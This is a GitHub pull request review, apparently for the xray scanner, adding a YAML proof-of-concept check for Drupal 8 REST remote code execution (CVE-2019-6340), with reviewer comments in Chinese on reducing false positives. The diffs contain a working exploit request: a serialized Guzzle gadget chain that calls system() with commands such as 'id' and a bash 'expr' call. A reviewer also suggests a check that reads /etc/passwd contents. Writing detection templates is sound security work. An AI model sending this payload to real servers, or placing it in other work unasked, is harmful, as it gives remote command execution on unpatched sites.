Create poc-yaml-cve-2019-6340.yml #485
Merged
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
virusdefender
requested changes
Oct 17, 2019
pocs/poc-yaml-cve-2019-6340.yml
Outdated
| - method: POST | ||
| path: /node/?_format=hal_json | ||
| headers: | ||
| User-Agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0)' |
There was a problem hiding this comment.
user agent 没有特殊情况不用写,会继承原始请求
pocs/poc-yaml-cve-2019-6340.yml
Outdated
| User-Agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0)' | ||
| Content-Type: application/hal+json | ||
| Accept: '*/*' | ||
| body: "{\n\t\"link\": [{\n\t\t\"value\": \"link\",\n\t\t\"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:2:\\\"id\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\"\n\t}],\n\t\"_links\": {\n\t\t\"type\": {\n\t\t\t\"href\": \"http://{{r1}}/rest/type/shortcut/default\"\n\t\t}\n\t}\n}" |
There was a problem hiding this comment.
这个body里面的 \n\t 是为了方便 json 展示的,实际 poc 最好不要带这个,可以直接去掉,或者这种形式取写
pocs/poc-yaml-cve-2019-6340.yml
Outdated
| User-Agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0)' | ||
| Content-Type: application/hal+json | ||
| Accept: '*/*' | ||
| body: "{\n\t\"link\": [{\n\t\t\"value\": \"link\",\n\t\t\"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:2:\\\"id\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\"\n\t}],\n\t\"_links\": {\n\t\t\"type\": {\n\t\t\t\"href\": \"http://{{r1}}/rest/type/shortcut/default\"\n\t\t}\n\t}\n}" |
There was a problem hiding this comment.
本漏洞一定要命令么,可以执行 php 代码么,如果可以,需要使用 php 代码执行,即使是命令执行,你这种写法也太容易误报了,参考下文档 https://chaitin.github.io/xray/#/guide/high_quality_poc
2、增加随机数判断
|
已修改为随机数 |
virusdefender
requested changes
Oct 17, 2019
pocs/poc-yaml-cve-2019-6340.yml
Outdated
| headers: | ||
| Content-Type: application/hal+json | ||
| Accept: '*/*' | ||
| body: "{\"link\": [{\t\"value\": \"link\",\t\"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:25:\\\"/bin/bash -c 'expr {{r2}}'\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\"}],\"_links\": {\t\"type\": {\t\t\"href\": \"http://{{r1}}/rest/type/shortcut/default\"\t}}\n}" |
There was a problem hiding this comment.
这样真的对么??? expr 就一个数字?
2、增加access的返回查找 3、修改为寻找随机字符串
|
1、修改为printf 32位随机字符串 |
|
还是不太对啊,理解一下 https://chaitin.github.io/xray/#/guide/high_quality_poc 第四条 |
|
r'root:[x*]:0:0:'.bmatches(body)验证~ |
phith0n
requested changes
Oct 21, 2019
pocs/poc-yaml-cve-2019-6340.yml
Outdated
| @@ -0,0 +1,18 @@ | |||
| name: poc-yaml-cve-2019-6340 | |||
There was a problem hiding this comment.
需要目标软件的名字,poc-yaml-drupal-cve-2019-6340
| @@ -0,0 +1,18 @@ | |||
| name: poc-yaml-drupal-cve-2019-6340 | |||
| set: | |||
| r1: parseURL(url)['host'] | |||
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
本 poc 是检测什么漏洞的
Drupal8's REST RCE, SA-CORE-2019-003, CVE-2019-6340
测试环境
docker pull knqyf263/cve-2019-6340
备注
参考链接:https://github.com/jas502n/CVE-2019-6340